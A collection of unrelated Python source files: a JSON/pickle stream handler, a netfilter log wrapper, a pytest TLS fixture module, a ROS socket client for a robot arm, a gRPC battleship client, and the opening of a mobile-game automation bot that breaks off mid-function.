the expense of CPU usage (by not re-using Pickler or Unpickler objects).
NOTE: StreamHandler currently assumes that same python version is installed
on both sides of reading/writing (or simplejson is loaded in case of one
side or other using python < 2.6). This could be resolved by requiring an
initial header with json vs pickle determination from the writing side, but
would considerably complicate the protocol(s) further (handshake would need
to occur at least, and assumes encoding is used over a socket, etc.)
json.raw_decode could be used rather than prepending with a message header
in theory (assuming json is available), but performance of repeatedly
failing to parse written data would make this an unworkable solution in
many cases.
"""
loads = staticmethod(loads)
dumps = staticmethod(dumps)
def __init__(self, fp):
"""
Stream handler that encodes objects as either JSON (if available) with
message length header prepended for sending over a socket, or as a
pickled object if using python < 2.6 and simplejson is not installed.
Since pickle.load has memory leak issues with memoization (remembers
absolutely everything decoded since instantiation), json is a preferred
method to encode/decode for long running processes which pass large
amounts of data back and forth.
"""
if _JSONAVAIL:
self._json_encoder = json.JSONEncoder(separators=(',', ':'),
sort_keys=True).encode
self._json_decoder = json.JSONDecoder(strict=False).decode
else:
def json_not_impl(dummy):
raise NotImplementedError(
'Python version < 2.6 and simplejson not installed. Please'
' install simplejson.')
self._json_decoder = staticmethod(json_not_impl)
self._json_encoder = staticmethod(json_not_impl)
self.fp = fp
def dump(self, obj):
"""
Similar method to json dump, prepending data with message length
header. Replaces pickle.dump, so can be used in place without
the memory leaks on receiving side in pickle.load (related to
memoization of data)
NOTE: Protocol is ignored when json representation is used
"""
# NOTE: Slightly less efficient than doing iterencode directly into the
# fp, however difference is negligable and reduces complexity of
# of the StreamHandler class (treating pickle and json the same)
write_list = []
if _JSONAVAIL:
write_list.append('J')
s = self._json_encoder(obj)
write_list.extend([str(len(s)), '|', s])
else:
write_list.append('P')
s = pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)
write_list.extend([str(len(s)), '|', s])
if PY2:
self.fp.write(''.join(write_list))
elif PY3:
self.fp.write(bytes(''.join(write_list), "UTF-8"))
# self.fp.flush()
def load(self):
"""
Reads in json message prepended with message length header from a file
(or socket, or other .read() enabled object). Message is expected to be
encoded by this class as well, to have same message length header type.
Specifically replaces pickle.load as that function/method has serious
memory leak issues with long term use of same Unpickler object for
encoding data to send, specifically related to memoization of data to
encode.
"""
header = self._load_header()
msgtype = header[0]
msglen = header[1:]
if not msglen.isdigit():
raise DecodeError('Message header not valid: %r' % header)
msglen = int(msglen)
buff = StringIO()
# Don't use StringIO.len for sizing, reports string len not bytes
buff.write(self.fp.read(msglen))
try:
if msgtype == 'J':
return self._json_decoder(buff.getvalue())
elif msgtype == 'P':
return pickle.loads(buff.getvalue())
else:
raise DecodeError("Message type %r not supported" % msgtype)
except DecodeError.wrapped_exceptions as e:
raise DecodeError(str(e))
def _load_header(self):
"""
Load in just the header bit from a socket/file pointer
"""
buff = StringIO()
while len(buff.getvalue()) == 0 or buff.getvalue()[-1] != '|':
recv_char = self.fp.read(1)
if not recv_char:
raise EOFError('File/Socket closed while reading load header')
buff.write(recv_char)
return buff.getvalue()[:-1]
|
libnetfilter_log.py
|
# Copyright (c) 2018 Fujitsu Limited
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import multiprocessing
import socket
import struct
import time
import cffi
import eventlet
from eventlet.green import zmq
from neutron_lib.utils import runtime
from os_ken.lib import addrconv
from os_ken.lib.packet import arp
from os_ken.lib.packet import ether_types
from os_ken.lib.packet import ethernet
from os_ken.lib.packet import ipv4
from os_ken.lib.packet import ipv6
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import excutils
from neutron_fwaas._i18n import _
from neutron_fwaas import privileged
from neutron_fwaas.privileged import utils as fwaas_utils
LOG = logging.getLogger(__name__)
# TODO(annp): consider to make a pub-sub pattern which allows other logging
# driver like snat log can consume libnetfilter_log
NETFILTER_LOG = 'netfilter_log'
ADDR_IPC = "ipc:///var/run/nflog"
CDEF = '''
typedef unsigned char u_int8_t;
typedef unsigned short int u_int16_t;
typedef unsigned int u_int32_t;
struct nfulnl_msg_packet_hdr {
u_int16_t hw_protocol; // hw protocol (network order)
u_int8_t hook; // netfilter hook
u_int8_t _pad;
};
int nflog_fd(struct nflog_handle *h);
ssize_t recv(int sockfd, void *buf, size_t len, int flags);
struct nflog_handle *nflog_open(void);
int nflog_close(struct nflog_handle *h);
int nflog_bind_pf(struct nflog_handle *h, u_int16_t pf);
int nflog_unbind_pf(struct nflog_handle *h, u_int16_t pf);
struct nflog_g_handle *nflog_bind_group(struct nflog_handle *h, u_int16_t num);
int nflog_unbind_group(struct nflog_g_handle *gh);
static const u_int8_t NFULNL_COPY_PACKET;
int nflog_set_mode(struct nflog_g_handle *gh, u_int8_t mode, unsigned int len);
int nflog_set_timeout(struct nflog_g_handle *gh, u_int32_t timeout);
int nflog_set_flags(struct nflog_g_handle *gh, u_int16_t flags);
int nflog_set_qthresh(struct nflog_g_handle *gh, u_int32_t qthresh);
int nflog_set_nlbufsiz(struct nflog_g_handle *gh, u_int32_t nlbufsiz);
typedef int nflog_callback(struct nflog_g_handle *gh,
struct nfgenmsg *nfmsg, struct nflog_data *nfd, void *data);
int nflog_callback_register(
struct nflog_g_handle *gh, nflog_callback *cb, void *data);
int nflog_handle_packet(struct nflog_handle *h, char *buf, int len);
struct nfulnl_msg_packet_hdr *nflog_get_msg_packet_hdr(
struct nflog_data *nfad);
u_int16_t nflog_get_hwtype(struct nflog_data *nfad);
u_int16_t nflog_get_msg_packet_hwhdrlen(struct nflog_data *nfad);
char *nflog_get_msg_packet_hwhdr(struct nflog_data *nfad);
u_int32_t nflog_get_nfmark(struct nflog_data *nfad);
int nflog_get_timestamp(struct nflog_data *nfad, struct timeval *tv);
u_int32_t nflog_get_indev(struct nflog_data *nfad);
u_int32_t nflog_get_physindev(struct nflog_data *nfad);
u_int32_t nflog_get_outdev(struct nflog_data *nfad);
u_int32_t nflog_get_physoutdev(struct nflog_data *nfad);
struct nfulnl_msg_packet_hw *nflog_get_packet_hw(struct nflog_data *nfad);
int nflog_get_payload(struct nflog_data *nfad, char **data);
char *nflog_get_prefix(struct nflog_data *nfad);
'''
ffi = None
libnflog = None
def init_library():
"""Load libnetfilter_log library"""
global ffi
global libnflog
if not ffi:
ffi = cffi.FFI()
ffi.cdef(CDEF)
if not libnflog:
try:
libnflog = ffi.dlopen(NETFILTER_LOG)
except OSError:
msg = "Could not found libnetfilter-log"
raise Exception(msg)
return ffi, libnflog
ffi, libnflog = init_library()
def _payload(nfa):
buf = ffi.new('char **')
pkt_len = libnflog.nflog_get_payload(nfa, buf)
if pkt_len <= 0:
return None
return ffi.buffer(buf[0], pkt_len)[:]
def decode(nfa):
"""This function analyses nflog packet by using os-ken packet library."""
prefix = ffi.string(libnflog.nflog_get_prefix(nfa))
packet_hdr = libnflog.nflog_get_msg_packet_hdr(nfa)
hw_proto = socket.ntohs(packet_hdr.hw_protocol)
msg = ''
msg_packet_hwhdr = libnflog.nflog_get_msg_packet_hwhdr(nfa)
if msg_packet_hwhdr != ffi.NULL:
packet_hwhdr = ffi.string(msg_packet_hwhdr)
if len(packet_hwhdr) >= 12:
dst, src = struct.unpack_from('!6s6s', packet_hwhdr)
# Dump ethernet packet to get mac addresses
eth = ethernet.ethernet(addrconv.mac.bin_to_text(dst),
addrconv.mac.bin_to_text(src),
ethertype=hw_proto)
msg = str(eth)
# Dump IP packet
pkt = _payload(nfa)
if hw_proto == ether_types.ETH_TYPE_IP:
ip_pkt, proto, data = ipv4.ipv4().parser(pkt)
msg += str(ip_pkt)
proto_pkt, a, b = proto.parser(data)
msg += str(proto_pkt)
elif hw_proto == ether_types.ETH_TYPE_IPV6:
ip_pkt, proto, data = ipv6.ipv6().parser(pkt)
proto_pkt, a, b = proto.parser(data)
msg += str(proto_pkt)
elif hw_proto == ether_types.ETH_TYPE_ARP:
ip_pkt, proto, data = arp.arp().parser(pkt)
msg += str(ip_pkt)
else:
msg += "Does not support hw_proto: " + str(hw_proto)
return {'prefix': str(prefix), 'msg': str(msg)}
class NFLogWrapper(object):
"""A wrapper for libnetfilter_log api"""
_instance = None
def __init__(self):
self.nflog_g_hanldes = {}
@classmethod
@runtime.synchronized("nflog-wrapper")
def _create_instance(cls):
if not cls.has_instance():
cls._instance = cls()
@classmethod
def has_instance(cls):
return cls._instance is not None
@classmethod
def clear_instance(cls):
cls._instance = None
@classmethod
def get_instance(cls):
# double checked locking
if not cls.has_instance():
cls._create_instance()
return cls._instance
def open(self):
self.nflog_handle = libnflog.nflog_open()
if not self.nflog_handle:
msg = _("Could not open nflog handle")
raise Exception(msg)
self._bind_pf()
def close(self):
if self.nflog_handle:
libnflog.nflog_close(self.nflog_handle)
def bind_group(self, group):
g_handle = libnflog.nflog_bind_group(self.nflog_handle, group)
if g_handle:
self.nflog_g_hanldes[group] = g_handle
self._set_mode(g_handle, 0x2, 0xffff)
self._set_callback(g_handle, self.cb)
def _bind_pf(self):
for pf in (socket.AF_INET, socket.AF_INET6):
libnflog.nflog_unbind_pf(self.nflog_handle, pf)
libnflog.nflog_bind_pf(self.nflog_handle, pf)
def unbind_group(self, group):
try:
g_handle = self.nflog_g_hanldes[group]
if g_handle:
libnflog.nflog_unbind_group(g_handle)
except Exception:
pass
def _set_mode(self, g_handle, mode, len):
ret = libnflog.nflog_set_mode(g_handle, mode, len)
if ret != 0:
msg = _("Could not set mode for nflog")
raise Exception(msg)
@ffi.callback("nflog_callback")
def cb(gh, nfmsg, nfa, data):
ev = decode(nfa)
msg = jsonutils.dumps(ev) + '\n'
ctx = zmq.Context(1)
pub = ctx.socket(zmq.XREQ)
pub.bind(ADDR_IPC)
pub.send(msg.encode('utf-8'))
pub.close()
return 0
def _set_callback(self, g_handle, cb):
ret = libnflog.nflog_callback_register(g_handle, cb, ffi.NULL)
if ret != 0:
msg = _("Could not set callback for nflog")
raise Exception(msg)
def run_loop(self):
fd = libnflog.nflog_fd(self.nflog_handle)
buff = ffi.new('char[]', 4096)
while True:
try:
pkt_len = libnflog.recv(fd, buff, 4096, 0)
except OSError as err:
# No buffer space available
if err.errno == 11:
continue
msg = _("Unknown exception")
raise Exception(msg)
if pkt_len > 0:
libnflog.nflog_handle_packet(self.nflog_handle, buff, pkt_len)
time.sleep(1.0)
def start(self):
nflog_process = multiprocessing.Process(target=self.run_loop)
nflog_process.daemon = True
nflog_process.start()
return nflog_process.pid
@privileged.default.entrypoint
def run_nflog(namespace=None, group=0):
"""Run a nflog process under a namespace
This process will listen nflog packets, which are sent from kernel to
userspace. Then it decode these packets and send it to IPC address for log
application.
"""
with fwaas_utils.in_namespace(namespace):
try:
handle = NFLogWrapper.get_instance()
handle.open()
handle.bind_group(group)
pid = handle.start()
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception("NFLOG thread died of an exception")
try:
handle.unbind_group(group)
handle.close()
except Exception:
pass
return pid
class NFLogApp(object):
"""Log application for handling nflog packets"""
callback = None
def register_packet_handler(self, caller):
self.callback = caller
def unregister_packet_handler(self):
self.callback = None
def start(self):
def loop():
while True:
if self.callback:
ctx = zmq.Context(1)
sub = ctx.socket(zmq.XREQ)
sub.connect(ADDR_IPC)
msg = sub.recv()
if len(msg):
self.callback(jsonutils.loads(msg))
sub.close()
time.sleep(1.0)
# Spawn loop
eventlet.spawn_n(loop)
|
conftest.py
|
import collections
import contextlib
import platform
import sys
import threading
import pytest
import trustme
from tornado import ioloop, web
from dummyserver.handlers import TestingApp
from dummyserver.server import HAS_IPV6, run_tornado_app
from .tz_stub import stub_timezone_ctx
# The Python 3.8+ default loop on Windows breaks Tornado
@pytest.fixture(scope="session", autouse=True)
def configure_windows_event_loop():
if sys.version_info >= (3, 8) and platform.system() == "Windows":
import asyncio
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
ServerConfig = collections.namedtuple("ServerConfig", ["host", "port", "ca_certs"])
@contextlib.contextmanager
def run_server_in_thread(scheme, host, tmpdir, ca, server_cert):
ca_cert_path = str(tmpdir / "ca.pem")
server_cert_path = str(tmpdir / "server.pem")
server_key_path = str(tmpdir / "server.key")
ca.cert_pem.write_to_path(ca_cert_path)
server_cert.private_key_pem.write_to_path(server_key_path)
server_cert.cert_chain_pems[0].write_to_path(server_cert_path)
server_certs = {"keyfile": server_key_path, "certfile": server_cert_path}
io_loop = ioloop.IOLoop.current()
app = web.Application([(r".*", TestingApp)])
server, port = run_tornado_app(app, io_loop, server_certs, scheme, host)
server_thread = threading.Thread(target=io_loop.start)
server_thread.start()
yield ServerConfig(host, port, ca_cert_path)
io_loop.add_callback(server.stop)
io_loop.add_callback(io_loop.stop)
server_thread.join()
@pytest.fixture
def no_san_server(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# only common name, no subject alternative names
server_cert = ca.issue_cert(common_name=u"localhost")
with run_server_in_thread("https", "localhost", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def ip_san_server(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP address in Subject Alternative Name
server_cert = ca.issue_cert(u"127.0.0.1")
with run_server_in_thread("https", "127.0.0.1", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def ipv6_addr_server(tmp_path_factory):
if not HAS_IPV6:
pytest.skip("Only runs on IPv6 systems")
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP address in Common Name
server_cert = ca.issue_cert(common_name=u"::1")
with run_server_in_thread("https", "::1", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def ipv6_san_server(tmp_path_factory):
if not HAS_IPV6:
pytest.skip("Only runs on IPv6 systems")
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP address in Subject Alternative Name
server_cert = ca.issue_cert(u"::1")
with run_server_in_thread("https", "::1", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.yield_fixture
def stub_timezone(request):
"""
A pytest fixture that runs the test with a stub timezone.
"""
with stub_timezone_ctx(request.param):
yield
|
HiwinRA605_socket_ros_20190530111958.py
|
#!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import talker as talk
import enum
data = '0' #設定傳輸資料初始直
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server -------
##--------touch strategy--------###
def point_data(req):
global client_response
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req):
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
return(1)
##--------touch strategy end--------###
def socket_server():
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
start_input=int(input('開始傳輸請按1,離開請按3 : '))
#start_input = 1
if start_input==1:
while 1:
##---------------socket 傳輸手臂命令-----------------
for case in switch(socket_cmd.action):
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
if case(Taskcmd.Action_Type.Mode):
data = TCP.SetMode()
break
socket_cmd.action= 5
s.send(data.encode('utf-8'))#socket傳送for python to translate str
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
###test 0403
if str(feedback_str[2]) == '70':# F
feedback = 0
socket_client_arm_state(feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T
feedback = 1
socket_client_arm_state(feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6
feedback = 6
socket_client_arm_state(feedback)
print("shutdown")
#Hiwin test 20190521
# feedback = 0
# socket_client_arm_state(feedback)
#Hiwin test 20190521
Arm_feedback = TCP.Is_busy(feedback)
###test 0403
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5
t = threading.Thread(target=thread_test)
t.start()
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line
|
battleship_client.py
|
import grpc
import logging
import queue
import threading
import uuid
from battleships_pb2 import Attack, Request, Response, Status
from battleships_pb2_grpc import BattleshipsStub
from client_interface import ClientInterface
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
class BattleshipClient(ClientInterface):
# The gRPC turn types mapped onto handler method names
RESPONSES = {
Response.State.BEGIN: 'begin',
Response.State.START_TURN: 'start_turn',
Response.State.STOP_TURN: 'end_turn',
Response.State.WIN: 'win',
Response.State.LOSE: 'lose',
}
# The gRPC report states mapped onto handler method names
STATES = {
Status.State.MISS: 'miss',
Status.State.HIT: 'hit',
}
__supported_events = [
'begin', 'start_turn', 'end_turn', 'attack',
'hit', 'miss', 'win', 'lose'
]
def __init__(self, grpc_host='localhost', grpc_port='50051'):
self.__handlers = {}
self.__host = grpc_host
self.__port = grpc_port
self.__player_id = ''
self.__queue = queue.Queue()
self.__channel = grpc.insecure_channel(f'{self.__host}:{self.__port}')
self.__stub = BattleshipsStub(self.__channel)
def __del__(self):
if self.__channel is not None:
self.__channel.close()
def on(self, event=None):
"""A decorator that is used to register an event handler for a
given event. This does the same as :meth:`add_event_handler`
but is intended for decorator usage:
@client.on(event='attack')
def on_attack(vector):
pass
:param event: The event that the handler should listen for. If
this parameter is None, the event is inferred from
the handler's name. For instance, to add a handler
for `attack` messages, you can simply write:
@client.on()
def attack(vector):
pass
Handlers that are supported are `begin`, `start_turn`,
`end_turn`, `attack`, `hit`, `miss`, `defeat`.
"""
def decorator(f):
self.add_event_listener(event, f)
return f
return decorator
def add_event_listener(self, event=None, handler=None):
"""Method that is used to register an event handler for a
given event. See :meth:`on` for a detailed explanation.
:param event: Event to register handler for
:param handler: Handler for event
"""
if event is None:
event = handler.__name__
if event not in self.__supported_events:
raise ValueError(f'Unable to register event {event}!')
logger.info(f'Registering {handler.__name__} for event "{event}"')
self.__handlers[event] = handler
def join(self):
"""This method sets up the client for sending and receiving gRPC
messages to the server. It then sends a join message to the game
server to indicate we are ready to play a new game.
"""
self.__player_id = str(uuid.uuid4())
logger.info(f'New player: {self.__player_id}')
threading.Thread(target=self.__receive_responses, daemon=True).start()
# Everything's set up, so we can now join a game
self.__send(Request(join=Request.Player(id=self.__player_id)))
def __send(self, msg):
"""Convience method that places a message in the queue for
transmission to the game server.
"""
self.__queue.put(msg)
def attack(self, vector):
"""This method sends an Attack message with the associated vector
to the game server. This method does not do any validation on the
provided vector, other than that is must be a string. It is up to
the caller to determine what the vector should look like.
:param vector: Vector to send to game server, e.g., "G4"
:raise ValueError: if vector is None or not a string
"""
if vector is None or type(vector) is not str:
raise ValueError('Parameter vector must be a string!')
self.__send(Request(move=Attack(vector=vector)))
def hit(self):
"""This method indicates to the game server that the received
attack was a HIT. Oh no!
"""
self.__send(Request(report=Status(state=Status.State.HIT)))
def miss(self):
"""This method indicates to the game server that the received
attack was a MISS. Phew!
"""
self.__send(Request(report=Status(state=Status.State.MISS)))
def defeat(self):
"""This method indicates to the game serve that the received
attack was a HIT, which sunk the last of the remaining ships.
In other words: Game Over. Too bad.
"""
self.__send(Request(report=Status(state=Status.State.DEFEAT)))
def __stream(self):
"""Return a generator of outgoing gRPC messages.
:return: a gRPC message generator
"""
while True:
s = self.__queue.get()
if s is not None:
logger.info(f'{self.__player_id} - Sending {s}')
yield s
else:
return
def __receive_responses(self):
"""Receive response from the gRPC in-channel.
"""
responses = self.__stub.Game(self.__stream())
while True:
try:
response = next(responses)
logger.info(f'{self.__player_id} - Received {response}')
self.__handle_response(response)
except StopIteration:
return
def __handle_response(self, msg):
"""This method handles the actual response coming from the game
server.
:param msg: Message received from the game server
"""
which = msg.WhichOneof('event')
if which == 'turn':
if msg.turn in self.RESPONSES:
self.__exc_callback(self.RESPONSES[msg.turn])
else:
logger.error('Response contains unknown state!')
elif which == 'move':
self.__exc_callback('attack', msg.move.vector)
elif which == 'report':
if msg.report.state in self.STATES:
self.__exc_callback(self.STATES[msg.report.state])
else:
logger.error('Report contains unknown state!')
else:
logger.error('Got unknown response type!')
def __exc_callback(self, *args):
"""Convenience method that calls the appropriate callback
function if it has been registered.
"""
cmd = args[0]
if cmd in self.__handlers:
self.__handlers[cmd](*args[1:])
|
bot.py
|
import threading
import traceback
from threading import Lock
import time
from tasks.Items import Items
from tasks.LostCanyon import LostCanyon
from tasks.Task import Task
from bot_related.bot_config import BotConfig
from bot_related.device_gui_detector import GuiDetector, GuiName
from filepath.file_relative_paths import ImagePathAndProps, VERIFICATION_CLOSE_REFRESH_OK, VERIFICATION_VERIFY_TITLE
from tasks.Alliance import Alliance
from tasks.Barbarians import Barbarians
from tasks.Break import Break
from tasks.ClaimQuests import ClaimQuests
from tasks.ClaimVip import ClaimVip
from tasks.Collecting import Collecting
from tasks.GatherResource import GatherResource
from tasks.LocateBuildings import LocateBuilding
from tasks.Materials import Materials
from tasks.Restart import Restart
from tasks.Scout import Scout
from tasks.ScreenShot import ScreenShot
from tasks.Tavern import Tavern
from tasks.Training import Training
from tasks.MysteryMerchant import MysteryMerchant
from tasks.SunsetCanyon import SunsetCanyon
from tasks.constants import TaskName
from utils import stop_thread
import random
DEFAULT_RESOLUTION = {'height': 720, 'width': 1280}
class Bot():
def __init__(self, device, config={}):
self.daemon_thread = None
self.curr_thread = None
self.device = device
self.gui = GuiDetector(device)
self.text_update_event = lambda v: v
self.text = {
'title': '',
'text_list': []
}
self.building_pos_update_event = lambda **kw: kw
self.config_update_event = lambda **kw: kw
# get screen resolution
str = device.shell('wm size').replace('\n', '')
height, width = list(map(int, str[(str.find(':') + 1):len(str)].split('x')))
self.resolution = {
'height': height,
'width': width
}
self.building_pos = {}
self.config = BotConfig(config)
self.curr_task = TaskName.BREAK
self.task = Task(self)
# tasks
self.restart_task = Restart(self)
self.break_task = Break(self)
self.mystery_merchant_task = MysteryMerchant(self)
self.alliance_task = Alliance(self)
self.barbarians_task = Barbarians(self)
self.claim_quests_task = ClaimQuests(self)
self.claim_vip_task = ClaimVip(self)
self.collecting_task = Collecting(self)
self.gather_resource_task = GatherResource(self)
self.locate_building_task = LocateBuilding(self)
self.materials_task = Materials(self)
self.scout_task = Scout(self)
self.tavern_task = Tavern(self)
self.training = Training(self)
self.sunset_canyon = SunsetCanyon(self)
self.lost_canyon = LostCanyon(self)
self.items_task = Items(self)
# Other task
self.screen_shot_task = ScreenShot(self)
self.round_count = 0
def start(self, fn):
if self.daemon_thread is not None and self.daemon_thread.is_alive():
stop_thread(self.daemon_thread)
print('daemon_thread: {}', self.daemon_thread.is_alive())
if self.curr_thread is not None and self.curr_thread.is_alive():
stop_thread(self.curr_thread)
print('curr_thread: {}', self.curr_thread.is_alive())
self.daemon(fn)
def stop(self):
if self.daemon_thread is not None and self.daemon_thread.is_alive():
stop_thread(self.daemon_thread)
print('daemon_thread: {}', self.daemon_thread.is_alive())
if self.curr_thread is not None and self.curr_thread.is_alive():
stop_thread(self.curr_thread)
print('curr_thread: {}', self.curr_thread.is_alive())
def get_city_image(self):
return self.screen_shot_task.do_city_screen()
def do_task(self, curr_task=TaskName.COLLECTING):
tasks = [
[self.mystery_merchant_task, 'enableMysteryMerchant'],
[self.alliance_task, 'allianceAction', 'allianceDoRound'],
[self.barbarians_task, 'attackBarbarians'],
[self.claim_quests_task, 'claimQuests', 'questDoRound'],
[self.claim_vip_task, 'enableVipClaimChest', 'vipDoRound'],
[self.collecting_task, 'enableCollecting'],
[self.gather_resource_task, 'gatherResource'],
[self.materials_task, 'enableMaterialProduce' , 'materialDoRound'],
[self.scout_task, 'enableScout'],
[self.tavern_task, 'enableTavern'],
[self.training, 'enableTraining'],
[self.sunset_canyon, 'enableSunsetCanyon'],
[self.lost_canyon, 'enableLostCanyon'],
[self.items_task, 'useItems']
]
if self.building_pos is None:
curr_task = TaskName.INIT_BUILDING_POS
else:
self.config.hasBuildingPos = True
while True:
# Check verification before every task
try:
self.task.get_curr_gui_name()
except Exception as e:
traceback.print_exc()
self.task.set_text(insert='cannot pass verification - stopping bot now')
self.stop()
random.shuffle(tasks)
# restart
if curr_task == TaskName.KILL_GAME and self.config.enableStop \
and self.round_count % self.config.stopDoRound == 0:
curr_task = self.restart_task.do(TaskName.BREAK)
elif curr_task == TaskName.KILL_GAME:
curr_task = TaskName.BREAK
# init building position if need
if not self.config.hasBuildingPos or curr_task == TaskName.INIT_BUILDING_POS:
self.task.set_text(insert='building positions not saved - recalculating')
curr_task = self.locate_building_task.do(next_task=TaskName.COLLECTING)
elif curr_task == TaskName.BREAK and self.config.enableBreak \
and self.round_count % self.config.breakDoRound == 0:
curr_task = self.break_task.do(TaskName.COLLECTING)
elif curr_task == TaskName.BREAK:
curr_task = self.break_task.do_no_wait(TaskName.KILL_GAME)
for task in tasks:
if len(task) == 2:
if getattr(self.config, task[1]):
curr_task = task[0].do()
else:
if getattr(self.config, task[1]) and self.round_count % getattr(self.config, task[2]) == 0:
curr_task = task[0].do()
if self.config.enableStop:
curr_task = TaskName.KILL_GAME
else:
curr_task = TaskName.BREAK
self.round_count = self.round_count + 1
return
def daemon(self, fn):
def run():
main_thread = threading.Thread(target=fn)
